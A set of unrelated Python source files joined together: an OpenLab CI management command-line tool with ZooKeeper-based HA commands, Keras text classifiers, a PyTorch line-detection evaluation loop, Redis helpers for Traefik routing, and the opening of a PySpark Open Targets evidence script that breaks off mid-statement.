raise argparse.ArgumentTypeError('Boolean value expected.')
@staticmethod
def _node_name_format(v):
spl_v = v.split('-')
if (len(spl_v) < 2 or spl_v[-2] != 'openlab' or
spl_v[-1] not in ['nodepool', 'zuul', 'zookeeper']):
raise argparse.ArgumentTypeError(
'Node name should be format like: '
'{cloud_provider}-openlab-{type}')
return v
def _add_check_cmd(self, parser):
# openlab check
cmd_check = parser.add_parser('check',
help='Check OpenLab environment.')
cmd_check.set_defaults(func=self.check)
cmd_check.add_argument('--type', default='default',
help="Specify a plugin type, like 'nodepool', "
"'jobs', 'all'. Default is 'default',"
" will skip the experimental plugins.")
cmd_check.add_argument('--cloud', default='all',
help="Specify a cloud provider, like 'otc', "
"'vexxhost'. Default is 'all'.")
cmd_check.add_argument('--nocolor', action='store_true',
help='Enable the no color mode.')
cmd_check.add_argument('--recover', action='store_true',
help='Enable the auto recover mode.')
def _add_hint_cmd(self, parser):
# openlab hint
cmd_hint = parser.add_parser(
'hint',
help='Print hint info.')
cmd_hint.set_defaults(func=self.hint)
cmd_hint.add_argument('--type', default='all',
help="Specify a hint type, "
"like 'resource', 'redundant'.")
def _add_repo_cmd(self, parser):
# openlab repo list
cmd_repo = parser.add_parser(
'repo',
help='The repos which enable the OpenLab.')
        cmd_repo_list_sub = cmd_repo.add_subparsers(title='repo', dest='repo')
cmd_repo_list = cmd_repo_list_sub.add_parser(
'list', help='List the repos which enable the OpenLab app.')
cmd_repo_list.set_defaults(func=self.repo_list)
cmd_repo_list.add_argument('--server', default='github.com',
help="Specify base server url. Default is "
"github.com")
cmd_repo_list.add_argument(
'--app-id', default='6778',
help="Specify the github APP ID, Default is 6778 (allinone: 7102,"
" OpenLab: 6778).")
cmd_repo_list.add_argument(
'--app-key', default='/var/lib/zuul/openlab-app-key.pem',
help='Specify the app key file path. Default is '
'/var/lib/zuul/openlab-app-key.pem')
def _add_ha_node_cmd(self, parser):
# openlab ha node
cmd_ha_node = parser.add_parser('node', help='Manage HA node.')
cmd_ha_node_subparsers = cmd_ha_node.add_subparsers(title='node',
dest='node')
# openlab ha node list
cmd_ha_node_list = cmd_ha_node_subparsers.add_parser(
'list', help='List all nodes.')
cmd_ha_node_list.set_defaults(func=self.ha_node_list)
cmd_ha_node_list.add_argument(
'--type', action='append',
choices=['nodepool', 'zuul', 'zookeeper'],
help='Filter the services with the specified node type.')
cmd_ha_node_list.add_argument(
'--role', action='append',
choices=['master', 'slave', 'zookeeper'],
help='Filter the services with the specified node role.')
# openlab ha node get
cmd_ha_node_get = cmd_ha_node_subparsers.add_parser(
'get', help='Get a node.')
cmd_ha_node_get.set_defaults(func=self.ha_node_get)
cmd_ha_node_get.add_argument('name', help='The node hostname.')
# openlab ha node create
cmd_ha_node_create = cmd_ha_node_subparsers.add_parser(
'init', help='Create a new node. This command usually should be '
'called by CI environment deploy tools when creating '
'a new system. Operators should be careful for this '
'command. One case for this command may like: the '
'data in zookeeper is broken or missing, but the '
'node works well, so that operators need to rebuild '
'the node info.')
cmd_ha_node_create.set_defaults(func=self.ha_node_create)
cmd_ha_node_create.add_argument(
'name', type=self._node_name_format,
help='The new node hostname, it should be global unique. Format: '
'{cloud-provider}-openlab-{type}.')
cmd_ha_node_create.add_argument(
'--type', required=True, choices=['nodepool', 'zuul', 'zookeeper'],
help="The new node type. Choose from 'nodepool', 'zuul' and "
"'zookeeper'")
cmd_ha_node_create.add_argument(
'--role', required=True, choices=['master', 'slave', 'zookeeper'],
help="The new node role. It should be 'master', 'slave' or "
"'zookeeper'.")
cmd_ha_node_create.add_argument(
'--ip', required=True, help="The new node's public IP.")
# openlab ha node set
cmd_ha_node_set = cmd_ha_node_subparsers.add_parser(
'set', help='Update a node.')
cmd_ha_node_set.set_defaults(func=self.ha_node_update)
cmd_ha_node_set.add_argument('name', help='The node hostname.')
cmd_ha_node_set.add_argument('--maintain', metavar='{yes, no}',
type=self._str2bool,
help='Set the node to maintained status.')
cmd_ha_node_set.add_argument(
'--role', choices=['master', 'slave'],
help="Update node role. It should be either 'master' or 'slave'. "
"Be careful to update the role, you should not update role "
"except emergency situations, because it will impact "
"checking scope of HA monitor , HA monitor will check and "
"update it with built-in policy automatically.")
# openlab ha node delete
cmd_ha_node_delete = cmd_ha_node_subparsers.add_parser(
'delete', help='Delete a node.')
cmd_ha_node_delete.set_defaults(func=self.ha_node_delete)
cmd_ha_node_delete.add_argument('name', help='The node hostname.')
def _add_ha_service_cmd(self, parser):
# openlab ha service
cmd_ha_service = parser.add_parser('service',
help='Manage HA service.')
cmd_ha_service_subparsers = cmd_ha_service.add_subparsers(
title='service', dest='service')
# openlab ha service list
cmd_ha_service_list = cmd_ha_service_subparsers.add_parser(
'list', help='List all services.')
cmd_ha_service_list.set_defaults(func=self.ha_service_list)
cmd_ha_service_list.add_argument(
'--node', action='append',
help='Filter the services with the specified node name.')
cmd_ha_service_list.add_argument(
'--role', action='append',
choices=['master', 'slave', 'zookeeper'],
help='Filter the services with the specified node role.')
cmd_ha_service_list.add_argument(
'--status', action='append',
choices=['up', 'down', 'restarting'],
help='Filter the services with the specified status.')
# openlab ha service get
cmd_ha_service_get = cmd_ha_service_subparsers.add_parser(
'get', help='Get a service.')
cmd_ha_service_get.set_defaults(func=self.ha_service_get)
cmd_ha_service_get.add_argument('name', help='service name.')
cmd_ha_service_get.add_argument(
'--node', required=True, help="The node where the service run.")
def _add_ha_cluster_cmd(self, parser):
# openlab ha cluster
cmd_ha_cluster = parser.add_parser('cluster',
help='Manage HA cluster.')
cmd_ha_cluster_subparsers = cmd_ha_cluster.add_subparsers(
title='cluster', dest='cluster')
# openlab ha cluster switch
cmd_ha_service_get = cmd_ha_cluster_subparsers.add_parser(
'switch', help='Switch Master and Slave role.')
cmd_ha_service_get.set_defaults(func=self.ha_cluster_switch)
# openlab ha cluster repair
cmd_ha_cluster_repair = cmd_ha_cluster_subparsers.add_parser(
'repair', help='HA deployment check and repair.')
cmd_ha_cluster_repair.set_defaults(func=self.ha_cluster_repair)
cmd_ha_cluster_repair.add_argument(
'--security-group',
help='Repair the Security Group of HA deployment.',
action='store_true', required=True)
cmd_ha_cluster_repair.add_argument(
            '--dry-run', help='Only report the check results of the HA '
                              'deployment; do not try to repair when a check '
                              'error is found.',
action='store_true')
def _add_ha_config_cmd(self, parser):
        # openlab ha config
cmd_ha_config = parser.add_parser('config',
help='Manage HA cluster '
'configuration.')
cmd_ha_config_subparsers = cmd_ha_config.add_subparsers(
title='config', dest='configuration')
# openlab ha config list
cmd_ha_config_list = cmd_ha_config_subparsers.add_parser(
'list', help='List all HA cluster config options.')
cmd_ha_config_list.set_defaults(func=self.ha_config_list)
# openlab ha config set
cmd_ha_config_set = cmd_ha_config_subparsers.add_parser(
'set', help='Update a HA cluster config option.')
cmd_ha_config_set.set_defaults(func=self.ha_config_update)
cmd_ha_config_set.add_argument('name',
help='The name of config option.')
cmd_ha_config_set.add_argument('value',
help='The value of config option.')
def _add_ha_cmd(self, parser):
# openlab ha
cmd_ha = parser.add_parser('ha',
help='Manage OpenLab HA deployment.')
cmd_ha_subparsers = cmd_ha.add_subparsers(title='ha', dest='ha')
self._add_ha_node_cmd(cmd_ha_subparsers)
self._add_ha_service_cmd(cmd_ha_subparsers)
self._add_ha_cluster_cmd(cmd_ha_subparsers)
self._add_ha_config_cmd(cmd_ha_subparsers)
def create_parser(self):
parser = argparse.ArgumentParser(
description='The command line tool for OpenLab management',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-c', dest='config',
help='path to config file')
parser.add_argument('-f', dest='format', choices=['raw', 'pretty'],
default='pretty',
help='output format')
subparsers = parser.add_subparsers(title='commands',
dest='command')
self._add_hint_cmd(subparsers)
self._add_repo_cmd(subparsers)
self._add_check_cmd(subparsers)
self._add_ha_cmd(subparsers)
return parser
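    # Example invocations accepted by the parser above (illustrative only):
    #   openlab check --cloud otc --recover
    #   openlab ha node list --type zuul --role master
    #   openlab ha config set allow_switch yes
    #   openlab repo list --app-id 6778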
def _get_cloud_list(self, cloud):
cloud_conf_location = self.config.get(
'check', 'cloud_conf', fallback='/etc/openstack/clouds.yaml')
with open(cloud_conf_location) as f:
clouds = yaml.load(f, Loader=yaml.FullLoader)
clouds_list = [c for c in clouds['clouds']]
if cloud not in clouds_list + ['all']:
raise exceptions.ClientError(
"Error: Cloud %(cloud)s is not found. Please use the cloud "
"in %(clouds_list)s or just use 'all'." % {
'cloud': cloud, 'clouds_list': clouds_list})
clouds_list = clouds_list if cloud == 'all' else [cloud]
return clouds_list
def _header_print(self, header):
print(_color(header))
print(_color("=" * 48))
def hint(self):
h = hint.Hint(self.args.type)
h.print_hints()
def repo_list(self):
r = repo.Repo(self.args.server,
self.args.app_id,
self.args.app_key)
repos = r.list()
print(utils.format_output('repo', repos))
print("Total: %s" % len(repos))
def check(self):
utils.NOCOLOR = self.args.nocolor
cloud_list = self._get_cloud_list(self.args.cloud)
if self.args.type == 'default':
plugins = list(filter(lambda x: not x.experimental,
base.Plugin.plugins))
elif self.args.type == 'all':
plugins = base.Plugin.plugins
else:
# Filter the plugins with specific ptype
plugins = list(filter(lambda x: x.ptype == self.args.type,
base.Plugin.plugins))
cnt = len(cloud_list)
exit_flag = False
for index, cloud in enumerate(cloud_list):
header = "%s/%s. %s cloud check" % (index + 1, cnt, cloud)
self._header_print(header)
for plugin_class in plugins:
plugin = plugin_class(cloud, self.config)
plugin.check_begin()
plugin.check()
plugin.check_end()
                # the failed flag is recorded during check()
if self.args.recover and plugin.failed:
plugin.recover()
if plugin.failed:
exit_flag = True
if exit_flag:
raise exceptions.ClientError("Error: cloud check failed.")
def _zk_wrapper(func):
def wrapper(self, *args, **kwargs):
if self.zk is None:
self.zk = zk.ZooKeeper(config=self.config)
try:
self.zk.connect()
func(self, *args, **kwargs)
finally:
self.zk.disconnect()
return wrapper
@_zk_wrapper
def ha_node_list(self):
result = self.zk.list_nodes(node_role_filter=self.args.role,
node_type_filter=self.args.type)
if self.args.format == 'pretty':
print(utils.format_output('node', result))
else:
dict_result = []
for node in result:
dict_result.append(node.to_dict())
print(dict_result)
@_zk_wrapper
def ha_node_get(self):
node_name = self.args.name
result = self.zk.get_node(node_name)
if self.args.format == 'pretty':
print(utils.format_output('node', result))
else:
print(result.to_dict())
@_zk_wrapper
def ha_node_create(self):
        if self.args.type == 'zookeeper':
            if self.args.role != 'zookeeper':
                raise argparse.ArgumentTypeError(
                    "a 'zookeeper' type node must use the 'zookeeper' role.")
        else:
            if self.args.role == 'zookeeper':
                raise argparse.ArgumentTypeError(
                    "the 'zookeeper' role is only valid for 'zookeeper' type "
                    "nodes.")
result = self.zk.create_node(self.args.name, self.args.role,
self.args.type, self.args.ip)
if self.args.format == 'pretty':
print(utils.format_output('node', result))
else:
print(result.to_dict())
@_zk_wrapper
def ha_node_update(self):
node_name = self.args.name
if self.args.maintain is None and not self.args.role:
raise exceptions.ClientError("Too few arguments")
maintain = self.args.maintain
role = self.args.role
result = self.zk.update_node(node_name, maintain, role)
if self.args.format == 'pretty':
print(utils.format_output('node', result))
else:
print(result.to_dict())
@_zk_wrapper
def ha_node_delete(self):
node_name = self.args.name
self.zk.delete_node(node_name)
@_zk_wrapper
def ha_service_list(self):
result = self.zk.list_services(self.args.node, self.args.role,
self.args.status)
if self.args.format == 'pretty':
print(utils.format_output('service', result))
else:
print(result.to_dict())
@_zk_wrapper
def ha_service_get(self):
result = self.zk.get_service(self.args.name.lower(), self.args.node)
if self.args.format == 'pretty':
print(utils.format_output('service', result))
else:
print(result.to_dict())
@_zk_wrapper
def ha_cluster_switch(self):
try:
self.zk.switch_master_and_slave()
print("Switch success")
except exceptions.OpenLabCmdError:
print("Switch failed")
@_zk_wrapper
def ha_cluster_repair(self):
        # TODO(bz): this repair may support other functions in the future
if self.args.security_group:
try:
self.zk.check_and_repair_deployment_sg(
is_dry_run=self.args.dry_run)
print("Check success")
except exceptions.OpenLabCmdError:
print("Check failed")
@_zk_wrapper
def ha_config_list(self):
result = self.zk.list_configuration()
if self.args.format == 'pretty':
print(utils.format_dict(result))
else:
print(result)
@_zk_wrapper
def ha_config_update(self):
value = self.args.value
if self.args.name in ['allow_switch']:
value = self._str2bool(value)
self.zk.update_configuration(self.args.name, value)
def run(self):
        # no arguments: print the help message, then exit with error (1)
if not self.args.command:
self.parser.print_help()
return 1
if not getattr(self.args, 'func', None):
help_message = subprocess.getoutput("%s -h" % ' '.join(sys.argv))
print(help_message)
return 1
self.args.func()
def _initConfig(self):
self.config = configparser.ConfigParser()
if self.args.config:
locations = [self.args.config]
else:
locations = ['/etc/openlab/openlab.conf',
'~/openlab.conf',
'/usr/local/etc/openlab/openlab.conf']
for fp in locations:
if os.path.exists(os.path.expanduser(fp)):
self.config.read(os.path.expanduser(fp))
return
raise exceptions.ClientError("Unable to locate config file in "
"%s" % locations)
def _main(self):
try:
self.parser = self.create_parser()
self.args = self.parser.parse_args()
self._initConfig()
return self.run()
except exceptions.OpenLabCmdError as e:
print(e)
return 1
@classmethod
def main(cls):
return cls()._main()
def main():
return OpenLabCmd.main()
if __name__ == '__main__':
sys.exit(main())
|
from __future__ import print_function
import numpy as np
import keras
from keras.preprocessing import sequence
import keras.preprocessing.text
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Embedding
from keras.layers import GlobalAveragePooling1D
from keras.datasets import imdb
import tempfile
def make_keras_picklable():
def __getstate__(self):
model_str = ""
with tempfile.NamedTemporaryFile(suffix='.hdf5', delete=True) as fd:
keras.models.save_model(self, fd.name, overwrite=True)
model_str = fd.read()
d = { 'model_str': model_str }
return d
def __setstate__(self, state):
with tempfile.NamedTemporaryFile(suffix='.hdf5', delete=True) as fd:
fd.write(state['model_str'])
fd.flush()
model = keras.models.load_model(fd.name)
self.__dict__ = model.__dict__
cls = keras.models.Model
cls.__getstate__ = __getstate__
cls.__setstate__ = __setstate__
make_keras_picklable()
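# A minimal sketch of what the patch above enables, assuming an h5py install
# (the model is round-tripped through the HDF5 format): pickling a compiled
# Keras model with the standard library pickle module.
#
#   import pickle
#   model = Sequential([Dense(1, input_shape=(4,), activation='sigmoid')])
#   model.compile(loss='binary_crossentropy', optimizer='adam')
#   restored = pickle.loads(pickle.dumps(model))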
def create_ngram_set(input_list, ngram_value=2):
"""
Extract a set of n-grams from a list of integers.
>>> create_ngram_set([1, 4, 9, 4, 1, 4], ngram_value=2)
{(4, 9), (4, 1), (1, 4), (9, 4)}
>>> create_ngram_set([1, 4, 9, 4, 1, 4], ngram_value=3)
    {(1, 4, 9), (4, 9, 4), (9, 4, 1), (4, 1, 4)}
"""
return set(zip(*[input_list[i:] for i in range(ngram_value)]))
def add_ngram(sequences, token_indice, ngram_range=2):
"""
Augment the input list of list (sequences) by appending n-grams values.
Example: adding bi-gram
>>> sequences = [[1, 3, 4, 5], [1, 3, 7, 9, 2]]
>>> token_indice = {(1, 3): 1337, (9, 2): 42, (4, 5): 2017}
>>> add_ngram(sequences, token_indice, ngram_range=2)
[[1, 3, 4, 5, 1337, 2017], [1, 3, 7, 9, 2, 1337, 42]]
Example: adding tri-gram
>>> sequences = [[1, 3, 4, 5], [1, 3, 7, 9, 2]]
>>> token_indice = {(1, 3): 1337, (9, 2): 42, (4, 5): 2017, (7, 9, 2): 2018}
>>> add_ngram(sequences, token_indice, ngram_range=3)
[[1, 3, 4, 5, 1337], [1, 3, 7, 9, 2, 1337, 2018]]
"""
new_sequences = []
for input_list in sequences:
new_list = input_list[:]
for i in range(len(new_list) - ngram_range + 1):
for ngram_value in range(2, ngram_range + 1):
ngram = tuple(new_list[i:i + ngram_value])
if ngram in token_indice:
new_list.append(token_indice[ngram])
new_sequences.append(new_list)
return new_sequences
class FastTextClassifier:
def __init__(self):
pass
def predict(self, X):
x_test = self.tokenizer.texts_to_sequences(X)
x_test = self.add_ngrams(x_test)
x_test = sequence.pad_sequences(x_test, maxlen=self.maxlen)
return self.model.predict_classes(x_test, verbose=0).flatten()
def predict_proba(self, X):
x_test = self.tokenizer.texts_to_sequences(X)
x_test = self.add_ngrams(x_test)
x_test = sequence.pad_sequences(x_test, maxlen=self.maxlen)
a = self.model.predict(x_test).flatten()
a = a.reshape(-1, 1)
return np.hstack((1 - a, a))
def fit(self, X, Y, ngram_range=1, max_features=20000, maxlen=400,
batch_size=32, embedding_dims=50, epochs=5):
self.tokenizer = keras.preprocessing.text.Tokenizer(
num_words=max_features, split=" ", char_level=False)
self.tokenizer.fit_on_texts(X)
x_train = self.tokenizer.texts_to_sequences(X)
self.ngram_range = ngram_range
self.maxlen = maxlen
self.add_ngrams = lambda x: x
if ngram_range > 1:
ngram_set = set()
for input_list in x_train:
for i in range(2, ngram_range + 1):
set_of_ngram = create_ngram_set(input_list, ngram_value=i)
ngram_set.update(set_of_ngram)
# Dictionary mapping n-gram token to a unique integer.
# Integer values are greater than max_features in order
# to avoid collision with existing features.
start_index = max_features + 1
self.token_indice = {v: k + start_index for k, v in enumerate(ngram_set)}
indice_token = {self.token_indice[k]: k for k in self.token_indice}
# max_features is the highest integer that could be found in the dataset.
max_features = np.max(list(indice_token.keys())) + 1
self.add_ngrams = lambda x: add_ngram(x, self.token_indice,
self.ngram_range)
x_train = self.add_ngrams(x_train)
print('Average train sequence length: {}'.format(np.mean(list(map(len, x_train)), dtype=int)))
x_train = sequence.pad_sequences(x_train, maxlen=self.maxlen)
self.model = Sequential()
# we start off with an efficient embedding layer which maps
# our vocab indices into embedding_dims dimensions
self.model.add(Embedding(max_features,
embedding_dims,
input_length=self.maxlen))
# we add a GlobalAveragePooling1D, which will average the embeddings
# of all words in the document
self.model.add(GlobalAveragePooling1D())
# We project onto a single unit output layer, and squash via sigmoid:
self.model.add(Dense(1, activation='sigmoid'))
self.model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
self.model.fit(x_train, Y, batch_size=batch_size, epochs=epochs, verbose=2)
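# A minimal usage sketch for FastTextClassifier, assuming `texts` is a list of
# raw strings and `labels` a matching array of 0/1 targets; the hyperparameters
# are illustrative, not tuned.
#
#   clf = FastTextClassifier()
#   clf.fit(texts, labels, ngram_range=2, epochs=5)
#   probs = clf.predict_proba(['a surprisingly good film'])  # shape (1, 2)
#   preds = clf.predict(['a surprisingly good film'])        # array of 0 / 1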
def get_most_common_embeddings(tokenizer, nlp):
import operator
most_common = list(map(operator.itemgetter(0), sorted(tokenizer.word_index.items(), key=operator.itemgetter(1))))
n = len(tokenizer.word_index)
if tokenizer.num_words is not None:
most_common = most_common[:tokenizer.num_words]
n = min(tokenizer.num_words, n)
embeddings = np.zeros((n + 1, nlp.vocab[0].vector.shape[0]), dtype='float32')
tokenized = nlp.tokenizer.pipe([x for x in most_common])
for i, lex in enumerate(tokenized):
if lex.has_vector:
embeddings[i + 1] = lex.vector
return embeddings
class CNNClassifier:
def __init__(self, nlp):
self.nlp = nlp
pass
def predict(self, X):
return self.predict_proba(X).argmax(axis=1)
def predict_proba(self, X):
x_test = self.tokenizer.texts_to_sequences(X)
x_test = sequence.pad_sequences(x_test, maxlen=self.maxlen)
a = self.model.predict(x_test, verbose=0).flatten()
a = a.reshape(-1, 1)
return np.hstack((1 - a, a))
def fit(self, X, Y, max_features=20000, maxlen=400,
batch_size=32, hidden_dims=250, filters=250, kernel_size=3,
epochs=5):
from keras.preprocessing import sequence
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation
from keras.layers import Embedding
from keras.layers import Conv1D, GlobalMaxPooling1D
self.tokenizer = keras.preprocessing.text.Tokenizer(
num_words=max_features, split=" ", char_level=False)
self.tokenizer.fit_on_texts(X)
x_train = self.tokenizer.texts_to_sequences(X)
self.maxlen = maxlen
embeddings = get_most_common_embeddings(self.tokenizer, self.nlp)
x_train = sequence.pad_sequences(x_train, maxlen=self.maxlen)
self.model = Sequential()
# we start off with an efficient embedding layer which maps
# our vocab indices into embedding_dims dimensions
self.model.add(
Embedding(
embeddings.shape[0],
embeddings.shape[1],
input_length=maxlen,
trainable=False,
weights=[embeddings]
)
)
self.model.add(Dropout(0.2))
# we add a Convolution1D, which will learn filters
# word group filters of size filter_length:
self.model.add(Conv1D(filters, kernel_size, padding='valid',
activation='relu', strides=1))
# we use max pooling:
self.model.add(GlobalMaxPooling1D())
# We add a vanilla hidden layer:
self.model.add(Dense(hidden_dims))
self.model.add(Dropout(0.2))
self.model.add(Activation('relu'))
# We project onto a single unit output layer, and squash it with a sigmoid:
self.model.add(Dense(1))
# model.add(Dense(3))
self.model.add(Activation('sigmoid'))
# optimizer = keras.optimizers.Adam(lr=0.001)
optimizer = keras.optimizers.Adam(lr=0.0001)
# model.compile(loss='categorical_crossentropy',
# optimizer=optimizer,
# metrics=['accuracy'])
self.model.compile(loss='binary_crossentropy',
optimizer=optimizer,
metrics=['accuracy'])
self.model.fit(x_train, Y, batch_size=batch_size, epochs=epochs, verbose=2)
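# A minimal usage sketch for CNNClassifier; it needs a spaCy pipeline with word
# vectors for get_most_common_embeddings (the model name below is an assumption,
# any vector-bearing pipeline works).
#
#   import spacy
#   nlp = spacy.load('en_core_web_md')
#   clf = CNNClassifier(nlp)
#   clf.fit(texts, labels, epochs=5)
#   preds = clf.predict(['a surprisingly good film'])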
|
import numpy as np
import torch
from evaluation.eval_process import *
from libs.utils import *
class Test_Process_DRM(object):
def __init__(self, cfg, dict_DB):
self.cfg = cfg
self.dataloader = dict_DB['testloader']
self.DNet = dict_DB['DNet']
self.RNet = dict_DB['RNet']
self.MNet = dict_DB['MNet']
self.forward_model = dict_DB['forward_model']
self.post_process = dict_DB['CRM_process']
self.eval_func = dict_DB['eval_func']
self.batch_size = self.cfg.batch_size['test_line']
self.size = to_tensor(np.float32(cfg.size))
self.candidates = load_pickle(self.cfg.pickle_dir + 'detector/detector_test_candidates')
self.candidates = to_tensor(self.candidates).unsqueeze(0)
self.cand_num = self.candidates.shape[1]
self.step = create_forward_step(self.candidates.shape[1],
cfg.batch_size['test_line'])
self.visualize = dict_DB['visualize']
def run(self, DNet, RNet, MNet, mode='test'):
result = {'out': {'pri': [], 'mul': []},
'gt': {'pri': [], 'mul': []}}
with torch.no_grad():
DNet.eval()
RNet.eval()
MNet.eval()
self.post_process.update_model(DNet, RNet, MNet)
for i, self.batch in enumerate(self.dataloader): # load batch data
self.img_name = self.batch['img_name'][0]
self.img = self.batch['img'].cuda()
pri_gt = self.batch['pri_gt'][0][:, :4]
mul_gt = self.batch['mul_gt'][0][:, :4]
# semantic line detection
out = self.forward_model.run_detector(img=self.img,
line_pts=self.candidates,
step=self.step,
model=DNet)
# reg result
out['pts'] = self.candidates[0] + out['reg'] * self.size
# cls result
pos_check = torch.argmax(out['cls'], dim=1)
out['pos'] = out['pts'][pos_check == 1]
# primary line
                sorted_idx = torch.argsort(out['cls'][:, 1], descending=True)
                out['pri'] = out['pts'][sorted_idx[0], :].unsqueeze(0)
if torch.sum(pos_check == 1) == 0:
out['pos'] = out['pri']
# post process
self.post_process.update_data(self.batch, self.img, out['pos'])
out['pri'], out['mul'] = self.post_process.run()
# visualize
self.visualize.display_for_test(batch=self.batch, out=out)
# record output data
result['out']['pri'].append(out['pri'])
result['out']['mul'].append(out['mul'])
result['gt']['pri'].append(pri_gt)
result['gt']['mul'].append(mul_gt)
print('image %d ---> %s done!' % (i, self.img_name))
# save pickle
save_pickle(dir_name=self.cfg.output_dir + 'test/pickle/',
file_name='result',
data=result)
return self.evaluation()
def evaluation(self):
# evaluation
data = load_pickle(self.cfg.output_dir + 'test/pickle/result')
auc_a = eval_AUC_A(out=data['out']['pri'],
gt=data['gt']['pri'],
eval_func=self.eval_func)
auc_p, auc_r = eval_AUC_PR(out=data['out']['mul'],
gt=data['gt']['mul'],
eval_func=self.eval_func)
return auc_a, auc_p, auc_r |
import os
import redis
_tls_store_certfile_key = "traefik/tls/stores/default/defaultCertificate/certFile"
_tls_store_certfile_value = "{cert_file}"
_tls_store_keyfile_key = "traefik/tls/stores/default/defaultCertificate/keyFile"
_tls_store_keyfile_value = "{key_file}"
_service_key = "traefik/tcp/services/{name}/loadBalancer/servers/0/address"
_service_value = "{host}:{port}"
_router_rule_key = "traefik/tcp/routers/{name}/rule"
_router_rule_value = "{rule}"
_router_service_key = "traefik/tcp/routers/{name}/service"
_router_service_value = "{service_name}"
_router_tls_key = "traefik/tcp/routers/{name}/tls"
_router_tls_value = "true"
def set_default_certificate(
    key_file: str = "/etc/certs/tls.key", cert_file: str = "/etc/certs/tls.crt"
):
    """Set the default TLS certificate in the traefik KV store if not already set.
    :param key_file: path of the TLS key file, defaults to "/etc/certs/tls.key"
    :type key_file: str, optional
    :param cert_file: path of the TLS certificate file, defaults to "/etc/certs/tls.crt"
    :type cert_file: str, optional
    """
    r = redis_conn()
check_key_file = r.get(_tls_store_keyfile_key)
check_cert_file = r.get(_tls_store_certfile_key)
if check_key_file is None or check_cert_file is None:
ok = r.set(
_tls_store_keyfile_key,
_tls_store_keyfile_value.format(key_file=key_file),
)
if not ok:
raise Exception("cannot set tls default key file")
ok = r.set(
_tls_store_certfile_key,
_tls_store_certfile_value.format(cert_file=cert_file),
)
if not ok:
raise Exception("cannot set tls default cert file")
r.close()
def redis_conn(
hostname: str = "localhost", port: int = 6379, password: str = ""
) -> "redis.Redis":
"""Establish a redis connection
    This function checks the following environment variables to establish
the connection:
- REDIS_HOSTNAME
- REDIS_PORT
- REDIS_PASSWORD
:return: the redis connection
:rtype: redis.Redis
"""
env_hostname = os.getenv("REDIS_HOSTNAME")
if env_hostname:
hostname = env_hostname
env_port = os.getenv("REDIS_PORT")
if env_port:
port = int(env_port)
env_password = os.getenv("REDIS_PASSWORD")
if env_password:
password = env_password
r = redis.Redis(host=hostname, port=port, password=password)
return r
def set_services(
name: str = "myservice", host: str = "127.0.0.1", port: int = -1
) -> bool:
"""Set traefic store kv of a service.
Ref: https://doc.traefik.io/traefik/routing/providers/kv/#services
:param name: name of the service to insert, defaults to "myservice"
:type name: str, optional
    :param host: host on which the service listens, defaults to "127.0.0.1"
    :type host: str, optional
    :param port: port on which the service listens, defaults to -1
    :type port: int, optional
:raises Exception: Not a valid port integer
:return: True if the operation went well
:rtype: bool
"""
if port <= 0:
raise Exception("not a valid port integer")
r = redis_conn()
res = r.set(
_service_key.format(name=name), _service_value.format(host=host, port=port)
)
r.close()
return res is True
def set_routers(
name: str = "myrouter",
service_name: str = "myservice",
rule: str = "Host(`example.com`)",
) -> bool:
"""Set traefic store kv of a router
:param name: name of the router to insert, defaults to "myrouter"
:type name: str, optional
:param service_name: name of the associated service, defaults to "myservice"
:type service_name: str, optional
:param rule: rule to store, defaults to "Host(`example.com`)"
:type rule: str, optional
:raises Exception: empty rule
:return: True if the operation went well
:rtype: bool
"""
if not (len(rule) > 0):
raise Exception("rule is an empty string")
r = redis_conn()
res_rule = r.set(
_router_rule_key.format(name=name), _router_rule_value.format(rule=rule)
)
res_service = r.set(
_router_service_key.format(name=name),
_router_service_value.format(service_name=service_name),
)
res_tls = r.set(_router_tls_key.format(name=name), _router_tls_value)
r.close()
return all([res_rule, res_service, res_tls])
def delete_route_info(router_name: str, service_name: str) -> bool:
"""Delete kv of a stored route
:param router_name: name of the router
:type router_name: str
:param service_name: name of the service associated
:type service_name: str
:return: True if the operation went well
:rtype: bool
"""
r = redis_conn()
res = r.delete(_service_key.format(name=service_name))
res_rule = r.delete(_router_rule_key.format(name=router_name))
res_service = r.delete(_router_service_key.format(name=router_name))
res_tls = r.delete(_router_tls_key.format(name=router_name))
r.close()
return all([res, res_rule, res_service, res_tls])
if __name__ == "__main__":
# smoke test redis module
print(set_services(name="service-1", port=8777))
print(
set_routers(
name="Router-1",
service_name="service-1",
rule="HostSNI(`username.192.168.0.1.myip.cloud.blabla.it`)",
)
)
print(delete_route_info(router_name="Router-1", service_name="service-1"))
set_default_certificate()
|
#!/usr/bin/env python
import argparse
import sys
import pyspark.sql
from pyspark.sql.types import DoubleType, StringType, IntegerType
from pyspark.sql.functions import col, lit, udf, when, expr, explode, substring, array, regexp_extract, concat_ws
import logging
def load_eco_dict(inf):
'''
Loads the csq to eco scores into a dict
Returns: dict
'''
# Load
eco_df = (
spark.read.csv(inf, sep='\t', header=True, inferSchema=True)
.select('Term', 'Accession', col('eco_score').cast(DoubleType()))
)
# Convert to python dict
eco_dict = {}
eco_link_dict = {}
for row in eco_df.collect():
eco_dict[row.Term] = row.eco_score
eco_link_dict[row.Term] = row.Accession
return (eco_dict, eco_link_dict)
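# The ECO table passed via --ecoCodes is expected to be a tab-separated file
# with at least the columns selected above: Term, Accession and eco_score.
# An illustrative row (the score value is made up):
#   missense_variant<TAB>http://purl.obolibrary.org/obo/SO_0001583<TAB>0.7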
def main():
# Parsing parameters:
parser = argparse.ArgumentParser(
description='This script pulls together data from Open Targets Genetics portal to generate Platform evidences.'
)
parser.add_argument('--locus2gene', help='Input table containing locus to gene scores.', type=str, required=True)
parser.add_argument('--toploci', help='Table containing top loci for all studies.', type=str, required=True)
parser.add_argument('--study', help='Table with all the studies.', type=str, required=True)
parser.add_argument(
'--variantIndex', help='Table with the variant indices (from gnomad 2.x).', type=str, required=True
)
parser.add_argument('--ecoCodes', help='Table with consequence ECO codes.', type=str, required=True)
parser.add_argument('--outputFile', help='Output gzipped json file.', type=str, required=True)
parser.add_argument('--threshold', help='Threshold applied on l2g score for filtering.', type=float, required=True)
parser.add_argument('--logFile', help='Destination of the logs generated by this script.', type=str, required=False)
args = parser.parse_args()
# extract parameters:
in_l2g = args.locus2gene
in_toploci = args.toploci
in_study = args.study
in_varindex = args.variantIndex
in_csq_eco = args.ecoCodes
l2g_threshold = args.threshold
# Initialize logger based on the provided logfile.
# If no logfile is specified, logs are written to stderr
logging.basicConfig(
level=logging.INFO,
